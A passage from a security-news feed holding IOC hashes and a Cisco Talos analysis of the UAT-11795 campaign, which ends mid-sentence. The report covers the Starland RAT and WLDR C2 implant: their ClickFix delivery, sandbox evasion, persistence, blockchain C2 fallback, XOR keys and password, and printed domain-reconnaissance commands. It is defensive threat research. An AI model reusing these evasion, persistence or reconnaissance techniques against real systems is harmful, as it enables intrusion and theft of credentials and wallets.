2915b3f8b703eb744fc54c81f4a9c67f&#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507&#xA0; Example Filename: VID001.exe &#xA0; Detection Name: Win.Worm.Coinminer::1201**&#xA0; SHA256: 9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f&#xA0; MD5: 38de5b216c33833af710e88f7f64fc98&#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f&#xA0; Example Filename: SECOH-QAD.exe&#xA0; Detection Name: Win.Tool.Procpatcher::1201&#xA0; SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 &#xA0; MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59&#xA0; Example Filename: tmp00055df5.dll &#xA0; Detection Name: Auto.90B145.282358.in02&#xA0; SHA256: b8be9a5e0a191050f9099c11c155b436863e9bc43bc904cdb842e249679aa35a&#xA0; MD5: 0398df5a18f71efcfeef4571a2cef577&#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=b8be9a5e0a191050f9099c11c155b436863e9bc43bc904cdb842e249679aa35a&#xA0; Example Filename: b8be9a5e0a191050f9099c11c155b436863e9bc43bc904cdb842e249679aa35a.js&#xA0; Detection Name: W32.B8BE9A5E0A-95.SBX.TG&#xA0;","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","threat-source-newsletter","geo:inferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":["NG","RU","US"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/begun-the-patch-wars-have/","type":"report","title":"Cisco Talos: Begun, the Patch Wars have"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-07-16T18:00:50.000Z","addedAt":"2026-07-29T20:53:06.625Z","updatedAt":"2026-07-29T20:53:06.625Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"c4ee77a3-7952-4ca9-8ac2-c5afd720bd53","slug":"talos-uat-11795-deploys-novel-starland-rat-and-bespoke-wldr-c2-c08de417","externalId":"6a511e0b501b2f00010617e7","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"UAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign","description":"Cisco Talos is disclosing UAT-11795, a sophisticated, Russian-speaking, financially motivated adversary that has been conducting a malicious campaign targeting users in the U.S. and Europe since at least&#xA0;June&#xA0;2025.&#xA0;&#xA0;Talos has discovered that the actor in this campaign delivers a Python-based&#xA0;remote&#xA0;access&#xA0;tool (RAT) that we track as &#x201C;Starland RAT&#x201D;&#xA0;and a&#xA0;command-and-control (C2)&#xA0;memory implant known as the &#x201C;WLDR agent.&#x201D;&#xA0;The WLDR agent is a sophisticated PowerShell-based C2 memory implant that features encrypted beaconing, task queuing, and a&#xA0;Runspace&#xA0;execution engine for executing&#xA0;additional&#xA0;payloads.&#xA0;&#xA0;UAT-11795 also&#xA0;has&#xA0;CastleStealer&#xA0;and&#xA0;Remcos&#xA0;RAT as alternative payload implants in their arsenal.&#xA0;The actor targets victims&apos; credentials and cryptocurrency wallet assets,&#xA0;establishing&#xA0;a persistent connection to the victims&apos; machines from the C2&#xA0;server, with the potential to deliver and execute further payloads.&#xA0;Victimology&#xA0;According to the telemetry data, the infection is&#xA0;predominantly observed&#xA0;in the United States.&#xA0;There are also&#xA0;fewer potential impacts&#xA0;observed&#xA0;in Germany, Romania, and Venezuela,&#xA0;based on&#xA0;the&#xA0;assessment of the&#xA0;passive DNS resolution data of the C2 domains associated with this campaign.&#xA0; Figure 1.&#xA0;Victimology map of this campaign.Talos has&#xA0;observed&#xA0;that the threat actor in this campaign has utilized&#xA0;trojanized&#xA0;installer lures from software categories including:&#xA0; Trojanized&#xA0;installer&#xA0;&#xA0; Software name&#xA0; Software category&#xA0; MobaXterm_v26.1.exe&#xA0; MobaXterm&#xA0; SSH, remote desktop, and network administration terminal&#xA0; WebEx_Client.exe and Zoom installer&#xA0; Cisco&#xA0;WebEx&#xA0;and Zoom&#xA0; enterprise video conferencing and collaboration platforms&#xA0; dbeaver-ce-windows-x86_64.exe&#xA0; DBeaverCommunity Edition&#xA0; open-source database management and SQL client&#xA0; FaceitInstaller_x64.exe&#xA0; FACEIT&#xA0; online gaming platform&#xA0; The breadth of&#xA0;trojanized&#xA0;software across developer tooling, IT administration utilities, enterprise collaboration platforms, and a consumer gaming application suggests the actor is&#xA0;operating&#xA0;an opportunistic, volume-driven distribution model targeting multiple victim profiles simultaneously,&#xA0;rather than a single vertical.&#xA0; Threat actor&#xA0;infrastructure&#xA0;Figure&#xA0;2.&#xA0;Cisco Umbrella domain resolution statistics for the malicious domains during the research window.The threat actor in this campaign&#xA0;operates&#xA0;a distributed infrastructure across two functional categories, payload staging and persistent&#xA0;C2,&#xA0;with domain naming conventions chosen to blend into legitimate traffic categories.&#xA0;The staging domains,&#xA0;including&#xA0;&#x201C;eorthopaedics[.]com&#x201D;&#xA0;(likely a&#xA0;hijacked domain),&#xA0;&#x201C;web-devtools[.]com&#x201D;&#xA0;(resembles&#xA0;a developer tooling portal),&#xA0;and &#x201C;zynaris[.]io&#x201D;&#xA0;(resembles a&#xA0;technology start-up),&#xA0;with each domain serving a narrow functional role:&#xA0;&#xA0; &#x201C;eorthopaedics[.]com&#x201D;&#xA0;and &#x201C;sastoro[.]com&#x201D;&#xA0;hosts the PowerShell stage chain under&#xA0;&#x201C;/feed/&#x201D;&#xA0;and &#x201C;/alpha/&#x201D; paths&#xA0;indicating&#xA0;that&#xA0;the actor&#xA0;has added the malicious routing alongside the legitimate contents.&#xA0;&#x201C;web-devtools[.]com&#x201D;&#xA0;serves raw shellcode payloads under the paths (&#x201C;/starlandfox&#x201D;,&#xA0;&#x201C;/x32remka&#x201D;,&#xA0;&#x201C;/dopfile&#x201D;) and a compressed archive.&#xA0;&#x201C;zynaris[.]io&#x201D;&#xA0;hosts the potential&#xA0;ClickFix-delivered&#xA0;HTML application (HTA)&#xA0;stager and&#xA0;trojanised&#xA0;installer lures.&#xA0;The C2 infrastructure is similarly distributed, with&#xA0;&#x201C;eorthopaedics[.]com&#x201D;&#xA0;and&#xA0;&#x201C;sastoro[.]com&#x201D;&#xA0;both serving&#xA0;hardware-bound unique identifier&#xA0;(HWID)&#xA0;encrypted envelopes over HWID parameterized URL paths with&#xA0;&#x201C;eorthopaedics[.]com&#x201D;&#xA0;under&#xA0;&#x201C;/feed/&#x201D;&#xA0;and&#xA0;&#x201C;sastoro[.]com&#x201D;&#xA0;under&#xA0;&#x201C;/alpha/&#x201D;.&#xA0;This&#xA0;suggests that&#xA0;the two domains&#xA0;represent&#xA0;parallel C2 infrastructure used for the same campaign.&#xA0; The domains&#xA0;&#x201C;windowscreenrepairnearme[.]com&#x201D;&#xA0;(which&#xA0;is&#xA0;also likely&#xA0;to be a hijacked&#xA0;domain)&#xA0;and&#xA0;&#x201C;aipythondevs[.]com&#x201D;&#xA0;serve&#xA0;as the&#xA0;primary&#xA0;C2 for the Starland Python RAT. All C2 URLs incorporate a victim hardware identifier derived from the C: drive&#xA0;volume serial number of the victim machine as the final URL path&#xA0;component, enabling the distinct C2 communication for each of the compromised victims. The actor in this campaign has also implemented C2 infrastructure resilience by using a Polygon smart contract&#xA0;(&#x201C;0x6ae382ed2154cc84c6672e4e908cd2c69c1b35ba&#x201D;),&#xA0;which stores an XOR-encrypted fallback C2 domain&#xA0;that is&#xA0;retrievable via a public JSON-RPC call.&#xA0;&#xA0; Talos discovered that the actor controls two&#xA0;Telegram bots,&#xA0;&#x201C;8384531459&#x201D;&#xA0;(&#x201C;skuefq_bot&#x201D;) and&#xA0;&#x201C;7993597060&#x201D;&#xA0;(&#x201C;komandastuk_bot&#x201D;),&#xA0;used for receiving the implant&#x2019;s execution notification beacons,&#xA0;including messages with victim&#x2019;s machine fingerprints and cryptocurrency&#xA0;wallet inventories.&#xA0; Figure&#xA0;3.&#xA0;Actor-controlled&#xA0;Telegram channel.&#xA0; Talos&#x2019;&#xA0;research&#xA0;uncovered a&#xA0;private live&#xA0;Telegram channel&#xA0;called&#xA0;&#x201C;stuk&#xA0;komanda&#x201D;,&#xA0;controlled by the same threat actor.&#xA0;The&#xA0;stuk&#xA0;komanda&#xA0;channel was created on June 5,&#xA0;2025,&#xA0;and has three&#xA0;unknown subscribers. It does not&#xA0;contain&#xA0;any chat groups and appears to be structured like a C2. The channel lists messages in the name of file names that&#xA0;appear to be&#xA0;Windows-based binaries, highlighting that the threat actor&#xA0;has been&#xA0;active since at least June 2025.&#xA0; Figure&#xA0;4.&#xA0;Messages seen&#xA0;on&#xA0;the&#xA0;Telegram channel.&#xA0; Multi-stage attack summary&#xA0;Figure&#xA0;5.&#xA0;Infection chain summary diagram.&#xA0;The threat actor&#xA0;executed&#xA0;a multistage campaign that involves deploying a weaponized HTA&#xA0;downloader via Microsoft HTML Application Host (&#x201C;mshta.exe&#x201D;) on the victim&apos;s machine,&#xA0;likely utilizing&#xA0;a&#xA0;ClickFix&#xA0;technique. The execution of the HTA file results in the downloading and execution of&#xA0;trojanized&#xA0;installers bundled with a malicious Python package, which sends the implant status of the installer to an attacker-controlled Telegram bot. The NSIS script associated with the&#xA0;trojanized&#xA0;installer is designed to execute the malicious byte-compiled Python code encapsulated within the installer file.&#xA0; This&#xA0;initial&#xA0;byte-compiled Python code acts as a loader that decodes and executes an embedded Python RAT, which we are calling Starland RAT, in the victim&apos;s machine memory. Starland RAT offers a wide range of functionalities and has been specifically engineered to&#xA0;operate&#xA0;within the Windows environment. Its capabilities include&#xA0;defense evasion techniques,&#xA0;system reconnaissance,&#xA0;stealing&#xA0;browser data and cryptocurrency&#xA0;wallets, and&#xA0;a fallback C2 connection mechanism that includes a hardcoded C2 URL, as well as a&#xA0;Polygon&#xA0;Ethereum&#xA0;smart&#xA0;contract&#xA0;that serves&#xA0;as a backup. This connection allows it to interact with the smart contract through Eth_call, dynamically resolving the C2 domains. The RAT sends the reconnaissance information to the C2 to register the victim&apos;s machine and is proficient in receiving and executing intermediate payloads in several formats, including&#xA0;shellcode for 64-bit and 32-bit Windows environments, directly executing Windows shell commands, and downloading and executing malicious EXE, MSI, and DLL files.&#xA0; Talos has&#xA0;observed&#xA0;that the threat actor has distinct infection chains for each type of intermediate payload that Starland RAT receives from the C2. In the case of an x64 shellcode intermediate payload, it implants&#xA0;CastleStealer&#xA0;as the final payload.&#xA0;CastleStealer&#xA0;is a .NET stealer that targets credentials, cryptocurrency&#xA0;wallets, Telegram data, and other browser data from the victim&apos;s machine. Similarly, the x32 shellcode implants a variant of the&#xA0;Remcos&#xA0;RAT.&#xA0; Furthermore, Talos has&#xA0;observed&#xA0;that the threat actor executed a Windows&#xA0;shell command through Starland RAT as an intermediate payload to download and execute a PowerShell stager. This stager is&#xA0;associated with an undocumented PowerShell C2 framework, which we track as &#x201C;WLDR C2&#x201D;&#xA0;in alignment with&#xA0;the internal project designation used by the threat actor in the PowerShell scripts. The PowerShell stager is heavily obfuscated and is designed to decrypt an embedded next-stage PowerShell loader. The second-stage PowerShell loader script has capabilities for defense evasion, connects to the C2, downloads a JSON response, and processes this response to execute another embedded PowerShell payload, the WLDR agent, in the victim&apos;s machine memory. The WLDR agent is a bespoke PowerShell script that receives its C2 address through the PowerShell loader injected global variable at the time of execution. The WLDR agent employs capabilities including encrypted HTTP beaconing, comprehensive host reconnaissance, a robust reconnection protocol, and a modular task execution engine to further execute the malicious PowerShell scripts as directed by the threat actor from the WLDR C2 server.&#xA0; Initial&#xA0;vector&#xA0;The threat actor&#xA0;gains&#xA0;initial access to the victim machine&#xA0;potentially&#xA0;through a&#xA0;ClickFix&#xA0;social engineering technique that entices the user to execute a command, which&#xA0;then&#xA0;stealthily downloads and executes a remotely hosted weaponized HTA file. The HTA file runs an embedded VBScript that drops a Windows batch file into the user profile&#x2019;s application temporary folder, which&#xA0;contains&#xA0;instructions to first download and implant a&#xA0;trojanized&#xA0;installer from the attacker-controlled staging domain onto the victim machine.&#xA0; Once the&#xA0;trojanized&#xA0;installer is executed, the batch file sends a notification beacon to an attacker-controlled Telegram bot,&#xA0;&#x201C;8384531459&#x201D;,&#xA0;to confirm successful execution to the threat actor. At the same time, the VBScript&#xA0;establishes&#xA0;persistence under&#xA0;&#x201C;HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run&#x201D;&#xA0;with the generic value&#xA0;&#x201C;MyApp&#x201D;,&#xA0;pointing back to&#xA0;&#x201C;mshta.exe&#x201D;&#xA0;to execute the remotely hosted weaponized HTA file every time the victim logs in to the machine. Talos&#xA0;identified&#xA0;a Russian-language developer comment left in the VBScript (&#x201C;&#x414;&#x43E;&#x431;&#x430;&#x432;&#x43B;&#x435;&#x43D;&#x438;&#x435;&#xA0;&#x43A;&#x43E;&#x43C;&#x430;&#x43D;&#x434;&#x44B;&#xA0;&#x432;&#xA0;&#x430;&#x432;&#x442;&#x43E;&#x437;&#x430;&#x43F;&#x443;&#x441;&#x43A;&#xA0;&#x434;&#x43B;&#x44F;&#xA0;&#x442;&#x435;&#x43A;&#x443;&#x449;&#x435;&#x433;&#x43E;&#xA0;&#x43F;&#x43E;&#x43B;&#x44C;&#x437;&#x43E;&#x432;&#x430;&#x442;&#x435;&#x43B;&#x44F;&#x201D;),&#xA0;indicating&#xA0;that a Russian-speaking actor is conducting this campaign.&#xA0; Figure&#xA0;6.&#xA0;Weaponized HTA file that downloads and executes&#xA0;trojanized&#xA0;installers.&#xA0;Python&#xA0;loader packaged into&#xA0;trojanized&#xA0;installers&#xA0;Talos has&#xA0;observed&#xA0;that the threat actor in this campaign has weaponized software installers by&#xA0;utilizing&#xA0;the&#xA0;Nullsoft&#xA0;Scriptable Install System (NSIS). They have packaged the Python runtime executable&#xA0;&#x201C;pythonw.exe&#x201D;&#xA0;along with a compiled Python loader, which is disguised as a license file named&#xA0;&#x201C;LICENSE.txt&#x201D;.&#xA0;The threat actor has&#xA0;modified&#xA0;the&#xA0;NSI&#xA0;script file of the installer to include instructions for executing&#xA0;the compiled Python loader using the Python runtime executable.&#xA0;&#xA0; Figure&#xA0;7.&#xA0;Install section of the&#xA0;NSI&#xA0;script of a sample&#xA0;trojanized&#xA0;installer.&#xA0;The compiled Python loader is a&#xA0;relatively large&#xA0;file obfuscated with&#xA0;numerous&#xA0;junk functions that perform random arithmetic operations and print randomly generated strings to the standard output. The actual execution logic is confined to six lines in the loader program, implementing XOR decryption using the XOR key 198 (0xC6) to decrypt the encrypted embedded payload of&#xA0;Starland RAT&#xA0;and execute it&#xA0;in the victim machine&apos;s memory. Figure&#xA0;8.&#xA0;Snippet of the decompiled&#xA0;Python loader program.Starland&#xA0;RAT, a&#xA0;Python-based&#xA0;RAT&#xA0;Starland is a Python-based&#xA0;remote&#xA0;access&#xA0;tool (RAT) with the capability to steal cryptocurrency. During its&#xA0;initial&#xA0;execution phase, the RAT resolves and declares all required Windows API function signatures through Python&#x2019;s&#xA0;ctypes&#xA0;interfaces. It directly loads&#xA0;&#x201C;kernel32.dll&#x201D;&#xA0;using&#xA0;WinDLL&#xA0;and explicitly defines the argument types and return types for every Win32 call used later in execution, including VirtualAllocEx,&#xA0;WriteProcessMemory,&#xA0;CreateRemoteThread,&#xA0;VirtualProtectEx,&#xA0;CreateProcessA,&#xA0;QueueUserAPC, and&#xA0;ResumeThread. Custom&#xA0;ctypes&#xA0;Structure subclasses are declared for SECURITY_ATTRIBUTES, STARTUPINFO, and PROCESS_INFORMATION, mirroring the definitions in the Windows SDK. This API mapping mechanism ensures that all injection and process manipulation calls later in execution are ready without further need for Windows API imports or dynamic resolution.&#xA0; Figure&#xA0;9.&#xA0;Snippet of the Starland RAT function for resolving and declaring the Windows API&#xA0;functions.&#xA0;Before any malicious logic executes, the RAT conducts&#xA0;check&#xA0;for anti-analysis environments. First, it compares the logged-on username of the victim machine against a hardcoded list of usernames, which includes known sandbox service accounts and aliases, including&#xA0;WDAGUtilityAccount. Next, the RAT verifies the victim&apos;s computer name against&#xA0;a&#xA0;list of hostnames from recognized sandbox environments, such as Cuckoo,&#xA0;Any.Run, Joe Sandbox, and Hybrid Analysis. If either check matches, the RAT&apos;s execution&#xA0;terminates&#xA0;immediately. Additionally, the RAT examines the Downloads folder for a&#xA0;Zone.Identifier&#xA0;alternate data stream on the&#xA0;trojanized&#xA0;installer file, confirming that the file was obtained via a browser download rather than being uploaded or copied directly.&#xA0; Figure&#xA0;10.&#xA0;Snippet of Starland RAT showing the hardcoded list of usernames and computer names for&#xA0;detection of&#xA0;evasion checks.&#xA0;The RAT&#xA0;establishes&#xA0;persistence before any network communication with the C2 takes place. The primary mechanism involves creating a scheduled task using the PowerShell New-ScheduledTask command, with a randomized name following the pattern PythonLauncher-{3 random characters}. When executed with administrator privileges, the trigger is set to&#xA0;AtLogOn&#xA0;with&#xA0;RunLevel&#xA0;Highest, ensuring the elevated re-execution of the RAT at every user logon. Additionally, a secondary Startup folder LNK shortcut is created via the&#xA0;WScript.Shell&#xA0;COM object, placed in the user&apos;s Startup directory, targeting&#xA0;&#x201C;pythonw.exe&#x201D;&#xA0;with LICENSE.txt&#xA0;as its argument. If the RAT is not already running with elevated privileges, it also&#xA0;attempts&#xA0;UAC elevation via&#xA0;ShellExecuteW&#xA0;with the runasverb, aiming to upgrade the scheduled task to the higher-privilege logon before&#xA0;proceeding.&#xA0; Figure&#xA0;11.&#xA0;Snippet of Starland RAT with the instructions for&#xA0;establishing&#xA0;persistence.&#xA0;It performs system reconnaissance, assembling the victim profile that includes the system hardware-bound unique identifier (HWID), total RAM size of the victim machine, and installed antivirus by executing the following commands:&#xA0; Get-CimInstance -Class Win32_ComputerSystemProduct.UUID&#xA0;&#xA0; wmic memorychip get Capacity&#xA0;&#xA0;&#xA0; Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct The RAT also conducts Active Directory reconnaissance via the PowerShell command Get-WmiObject Win32_ComputerSystem.Domain. If the victim is identified as a member of Active Directory, the RAT executes the following commands to collect information about domain structure, domain controllers, and the victim&#x2019;s domain privileges:&#xA0; whoami && systeminfo && net user {USERNAME} /dom && nltest /dclist For workgroup-only hosts, it executes the whoami /all command. The reconnaissance data collected are staged by the RAT for inclusion during the victim machine registration to the primary C2 domain hardcoded in the RAT program. It also captures a screenshot of the victim machine&apos;s desktop, saves it as a PNG in the RAT&#x2019;s working directory, generates a&#xA0;Base64-encoded string for the PNG file in memory, stages it alongside the reconnaissance data, and deletes the PNG file from the disk.&#xA0; Additionally, it gathers the victim&#x2019;s cryptocurrency assets information by&#xA0;enumerating&#xA0;the desktop&#xA0;cryptocurrency&#xA0;wallets and browser extension wallets, checking for the presence of over 40 cryptocurrency&#xA0;wallets.&#xA0;The collected data&#xA0;is also staged alongside the reconnaissance data and the&#xA0;Base64-encoded screenshot (PNG)&#xA0;data. The&#xA0;RAT consolidates all collected data into a single JSON file, XOR encrypts it with the 5-byte key &#x201C;helo1&#x201D;,&#xA0;Base64-encodes it, and sends it to the primary C2 through&#xA0;an HTTP POST request using the HTTP user-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)&#xA0;AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36.&#xA0;&#xA0; If the primary C2 registration fails, the RAT enables a blockchain-anchored fallback mechanism. An eth_call is triggered via JSON-RPC to the public Polygon RPC endpoint&#xA0;&#x201C;polygon-rpc[.]com&#x201D;,&#xA0;targeting the smart contract &#x201C;0x6ae382ed2154cc84c6672e4e908cd2c69c1b35ba&#x201D; and function selector &#x201C;0xc659f3b8&#x201D; for the latest block. The encrypted hexadecimal string that the RAT receives from the smart contract is XOR-decrypted with the key &#x201C;$m7*rYpry3&#x201D; to recover a fallback domain to which the RAT sends the victim machine registration request along with the reconnaissance and screenshot data.&#xA0; Before transmitting the reconnaissance information to the C2 for the victim&apos;s machine registration, the RAT sends a notification message to the attacker-controlled Telegram bot using hardcoded credentials. The message includes the victim&apos;s public IP address sourced from&#xA0;&#x201C;api64.ipify[.]org&#x201D;,&#xA0;the build name, region locale, computer name presented as a&#xA0;&#x201C;Crew ID&#x201D;&#xA0;field, OS platform and release, processor string, and the hardcoded label&#xA0;&#xA0; \"Windows Defender&#x201D;&#xA0;as the protection application indicator. If any Chrome cryptocurrency&#xA0;wallet extensions or desktop cold wallet applications were detected during the reconnaissance phase, they were also appended to the message of the Telegram bot, providing the threat actor with visibility into the victim profile and cryptocurrency&#xA0;assets before the actual registration of the victim machine to the C2.&#xA0; Figure&#xA0;12.&#xA0;Starland RAT&#x2019;s&#xA0;Telegram bot message beaconing function.After the RAT registers the&#xA0;compromised&#xA0;machine with the C2, it sends a GET request to the C2 server every 50&#xA0;&#x2013;&#xA0;60 seconds. It&#xA0;contains&#xA0;minimal JSON content with two randomly named junk fields and the bot&apos;s unique identifier, encoded using the same XOR key &#x201C;helo1&#x201D; and then&#xA0;Base64&#xA0;encoded. The C2 server responds with one of the&#xA0;four&#xA0;commands supported by the RAT:&#xA0; Commands&#xA0; Action&#xA0; shellexecute&#xA0; Runs an arbitrary shell string via &#x201C;cmd&#xA0;/c&#x201D; or PowerShell and returns the output to the&#xA0;C2 server through&#xA0;HTTP POST&#xA0;request.&#xA0; x32&#xA0; Receives a 32-bit shellcode&#xA0;URL&#xA0;and executes&#xA0;the&#xA0;shellcode that is&#xA0;staged&#xA0;using&#xA0;the&#xA0;asynchronous procedure&#xA0;call&#xA0;(APC), process&#xA0;injection technique.&#xA0; x64&#xA0; Receives a 64-bit shellcode URL and executes the&#xA0;shellcode that is staged using the&#xA0;asynchronous procedure&#xA0;call&#xA0;(APC), process injection technique.&#xA0; download&#xA0;&#xA0; Downloads the&#xA0;payload file to the&#xA0;&#x201C;%TEMP%&#x201D;&#xA0;folder and executes it by file extension, supporting EXE, MSI, DLL,&#xA0;and ZIP formats with&#xA0;appropriate&#xA0;execution&#xA0;methods.&#xA0; HTTP&#xA0;403&#xA0;response&#xA0; Triggers the self-deletion of the RAT file and exits its process, functioning as a kill switch.&#xA0;&#xA0; Figure&#xA0;13.&#xA0;Starland RAT command processing function.&#xA0;Windows&#xA0;shell command deploys&#xA0;bespoke&#xA0;WLDR&#xA0;agent C2&#xA0;implant&#xA0;In the current campaign investigation, Talos discovered that the threat actor executed a&#xA0;curl command to download and execute&#xA0;additional&#xA0;PowerShell script payloads of the WLDR C2 framework from another C2.&#xA0;&#xA0; Figure 14.&#xA0;curl&#xA0;command to download the WLDR stager.WLDR stager&#xA0;The WLDR stager PowerShell script&#xA0;represents&#xA0;the&#xA0;initial&#xA0;stage, where it&#xA0;establishes&#xA0;a loop counter and two&#xA0;boolean&#xA0;flags for execution states. Each state creates a runtime alias for PowerShell command execution, resolving .NET&#xA0;Base64 and byte conversion types through an obfuscated string construction mechanism. It also defines an inline decryption routine that XOR decrypts the next stage, which is the embedded encrypted WLDR downloader PowerShell script, using a dynamically computed XOR key.&#xA0; Figure 15.&#xA0;Snippet of the WLDR PowerShell stager script.&#xA0;WLDR downloader&#xA0;&#xA0;WLDR downloader is a compact HWID-bound loader script. Upon execution, it derives a hardware identifier from the victim&#x2019;s C: drive volume serial number, converts it from hexadecimal to a decimal number, and appends it to two hardcoded C2 URLs for victim-specific payload delivery and a persistent agent task channel. It then issues an&#xA0;HTTP GET&#xA0;request to the C2, and the C2 server only responds to requests whose HWID matches a pre-registered value. The C2 server response is an encrypted JSON envelope&#xA0;containing&#xA0;fields with a&#xA0;Base64-encoded salt, initialization vector, encrypted data, and authentication tag.&#xA0; The WLDR loader processes the JSON response by decrypting the envelope through an inline decryption routine using a derived 64-byte key from a hardcoded plaintext password &#x201C;odg5t8mvssvh&#x201D; and the salt received from the C2 server in the JSON response. This is followed by the decryption of the encrypted data, which is the next stage of the WLDR agent PowerShell C2 memory implant. Before executing the WLDR agent, it writes the C2 URL and the plaintext password into the global PowerShell scope, making both available for the WLDR agent as its C2 address and session encryption key for all&#xA0;subsequent&#xA0;communication with the C2.&#xA0; Figure 16.&#xA0;Snippet of the WLDR PowerShell downloader.Figure 17.&#xA0;Sample JSON response from the C2 server.Bespoke&#xA0;WLDR&#xA0;C2 agent&#xA0;implant&#xA0;The WLDR agent is a fully featured PowerShell remote access client that&#xA0;operates&#xA0;entirely in memory. It implements encrypted C2 communications, concurrent task execution through a managed&#xA0;Runspace&#xA0;engine, and a module delivery framework that provides the threat actor with interactive remote PowerShell execution capabilities on the victim&apos;s machine.&#xA0; Upon execution, the agent initializes the server&apos;s URL to a development placeholder and&#xA0;immediately&#xA0;checks for a globally scoped URL and session encryption password that were set by the WLDR loader script. If found, it overwrites the placeholder with the C2 URL and inherits the session encryption password, while also configuring other operational parameters, including polling interval, HTTP timeout, retry counts for the C2 reconnect cycle, and the number of threads for the&#xA0;Runspace&#xA0;pool.&#xA0; Figure 18.&#xA0;Snippet of the WLDR agent with the configuration parameters.Before&#xA0;initiating&#xA0;the C2 connectivity, it implements a mutex &#x201C;f2j398fj239d8j23dkkskskkkkkkkkk&#x201D; to prevent duplicate instances and performs a dependency check on the inherited session encryption password. If the password is not found, the agent exits its execution. The network communication is encrypted using AES-256-CBC with HMAC-SHA256 in an&#xA0;encryption,&#xA0;then Message Authentication Code (MAC) construction, with session keys derived through PBKDF2-SHA256 over a randomly generated salt at 5,000 iterations. The protocol version tag WSv1 is bound to every MAC computation, with a new random&#xA0;initialization vector (IV)&#xA0;generated for each message.&#xA0; The agent performs reconnaissance via WMI queries, gathering information on antivirus products, network adapter configurations,&#xA0;OS&#xA0;version and build, domain membership, CPU, RAM, administrative privilege status, and UAC policy. A hardware identifier is primarily derived from the C: drive volume serial number; if that fails, it queries the&#xA0;machine&apos;s&#xA0;registry for the GUID or generates a checksum of the host&#xA0;name, which is appended to all C2 URLs. The&#xA0;initial&#xA0;connection to the C2 is&#xA0;established&#xA0;through an&#xA0;HTTP POST&#xA0;that includes the victim machine profile, the infection identifier, protocol version 2.0.0, and the cryptographic session parameters, with a connection retry timing set to 30 seconds. All&#xA0;subsequent&#xA0;traffic is sent to C2 over HTTPS, with headers designed to mimic a Chrome browser session in version 124.&#xA0; Figure 19.&#xA0;Snippet of WLDR agent C2 handshake function.After&#xA0;establishing&#xA0;the initial connection with the C2, the agent polls the C2 server every 10 seconds. The response from the C2 server can include either commands or tasks, with the only hardcoded command in the agent&#xA0;being&#xA0;a kill instruction that triggers instance termination, while tasks are queued for execution.&#xA0; Figure&#xA0;20.&#xA0;Snippet of WLDR agent&#x2019;s C2 polling function.&#xA0;During our research, we&#xA0;observed&#xA0;that the&#xA0;initial&#xA0;response from the C2 was the idle polling interval response, which included empty fields in both the &#x201C;commands&#x201D; and &#x201C;tasks&#x201D; arrays.&#xA0; Figure&#xA0;21.&#xA0;Initial WLDR agent polling response from the C2. Further analysis of the&#xA0;agent&#xA0;program&#xA0;disclosed&#xA0;that the C2 responses&#xA0;to the polling will&#xA0;contain&#xA0;encrypted PowerShell&#xA0;commands or&#xA0;scripts,&#xA0;which&#xA0;are decrypted using the same hardcoded password&#xA0;and executed&#xA0;through one of the two runtime engines&#xA0;defined in&#xA0;the backdoor&#xA0;program.&#xA0;&#xA0; The primary&#xA0;agent execution&#xA0;engine is a PowerShell&#xA0;RunspacePool&#xA0;supporting&#xA0;up to&#xA0;10 concurrent threads.&#xA0;Each PowerShell script payload delivered by the C2 is wrapped with&#xA0;details of execution context and parameters as in scope variables along with event handlers on&#xA0;the script&#x2019;s execution&#xA0;result of&#xA0;output,&#xA0;error,and warnings.&#xA0;These event handlers registered on the output, error,&#xA0;and warning streams are triggered synchronously&#xA0;as the script execution output is produced, packaging results into stream messages and forwards them to the C2 in real time&#xA0;without waiting for the script execution completion.&#xA0;&#xA0; This message streaming capability makes the&#xA0;WLDR agent&#x2019;s&#xA0;Runspace&#xA0;engine&#xA0;favorable&#xA0;for the interactive operations such as&#xA0;continuous&#xA0;monitoring where the command output reaches the threat actor incrementally,&#xA0;rather&#xA0;than after the completion of the script execution.&#xA0;&#xA0; Figure&#xA0;22.&#xA0;WLDR agent function of handling the&#xA0;Runspace&#xA0;engine.&#xA0;If the&#xA0;Runspace&#xA0;engine&#xA0;fails to&#xA0;initialize the payload, PowerShell script execution defaults to standard PowerShell background jobs. It injects parameters and launches the script as a background job; however, unlike the&#xA0;Runspace&#xA0;path, it collects output only after the job completes, making it suitable only for short-lived batch tasks.&#xA0; Figure&#xA0;23.&#xA0;WLDR agent PowerShell job execution handlers.&#xA0;Other payloads of Starland RAT campaign&#xA0;Talos has discovered that the threat actor&#xA0;possesses&#xA0;additional&#xA0;malware, including&#xA0;CastleStealer&#xA0;and&#xA0;Remcos&#xA0;RAT, which can be deployed as payloads to the victim&apos;s machine via the Starland RAT. To deliver these payloads, the threat actor&#xA0;utilizes&#xA0;a custom shellcode loader for both x64 and x32 machines, encapsulating the embedded encrypted binaries of the payloads.&#xA0; The shellcode loader resolves all required Windows APIs entirely at runtime by&#xA0;enumerating&#xA0;the list of loaded modules in the&#xA0;OS&#xA0;memory, iterating through each module&apos;s export directory, and comparing a hash of each function name against stored target values. The shellcode neutralizes both the Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW) through two sequential bypass 